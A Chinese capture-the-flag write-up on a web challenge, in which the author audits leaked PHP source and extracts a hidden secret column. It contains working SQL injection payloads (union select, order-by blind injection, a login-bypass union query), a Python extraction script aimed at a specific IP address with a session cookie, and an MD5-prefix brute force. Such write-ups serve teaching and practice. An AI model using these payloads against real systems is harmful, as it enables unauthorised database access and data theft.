太菜了错失5k
首先扫目录发现register.php
,然后注册一下,发现profile.php?id=xx
,然后id=2
显示hintthisissource.php
,下载源码,审计。
登录和注册处发现过滤了单引号和斜杠
1
| if(strlen($username) < 3 or preg_match("|'|",$username) or preg_match("|\\\\|",$username))
|
然后在profile.php
里发现,id只过滤了. ( ) _
,然后可以子查询,id=0 union select 1,2,3,4,5
,然后发现2字段可显,然后钻牛角尖注了一个晚上没弄出来。
后来再看一遍源码发现
1
2
3
4
5
6
7
8
| CREATE TABLE `users` (
`id` int(5) NOT NULL AUTO_INCREMENT,
`user` varchar(20) DEFAULT NULL,
`pass` varchar(32) DEFAULT NULL,
`$secret` varchar(36) DEFAULT NULL,
`count` int(3) DEFAULT NULL,
PRIMARY KEY (`id`)
)
|
$secret
在第4个字段,然后经过学长提醒可以用order by 注入,顿时想起以前的博文里有个知识点。
虽然有查询次数的限制
1
2
3
4
5
6
7
8
9
10
| if($row['count'] == 140)
{
if(mysql_query("update users set $secret='{$duihuanma}' where user='$username';"))
{
mysql_query("update users set count=0 where user='$username';");
die("<center><br><h3>尝试次数过多,兑换码已经重置</h3></center>");
}
return $duihuanma;
}
|
但这里的username是session里的,可以注册两个号,一个大号一个小号,拿小号的session跑大号的id,这样小号的$secret会无限重置,但大号纹丝不动。
所以上脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| import requests
import hashlib
import random
url = 'http://54.223.59.178/profile.php?id='
cookie = {'PHPSESSID':'03faiapvojtao8uhs323venhd4'}
string = '0123456789abcdefghijklmnopqrstuvwxyz{'
ch = 'apohnw4bjlyr62qicd5f18zexkt9vu7gm3'
for i in range(36):
for k in range(37):
payload = '29 union select 1,2,3,\''+ch+str(string[k])+'\',5 order by 4'
re = requests.get(url=url+payload,cookies=cookie)
#print(re.text)
if 'hammer' in re.text:
ch = ch + string[k-1]
print(ch)
break
if len(ch) == 36:
break
while 1:
s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
if hashlib.md5(s.encode('utf_8')).hexdigest()[0:4] == 'ee3c':
print(s)
break
|
这个脚本不是很稳定,当跑崩的时候把最后一位删了重新跑就ok
EOF
其实还可以注password,一点过滤都没有
1
| $sql = "select id,user from users where user = '$username' and pass = md5('$password')";
|
所以payload: username=ashdasohdia&password=1') union select d,1 from (select 1 as a,2 as b,3 as c,4 as d,5 as f from users where id = 0 union select * from users where id = 29) as a%23
username一定要xjb打,就是让它查不到
在302跳转的id里就有$secret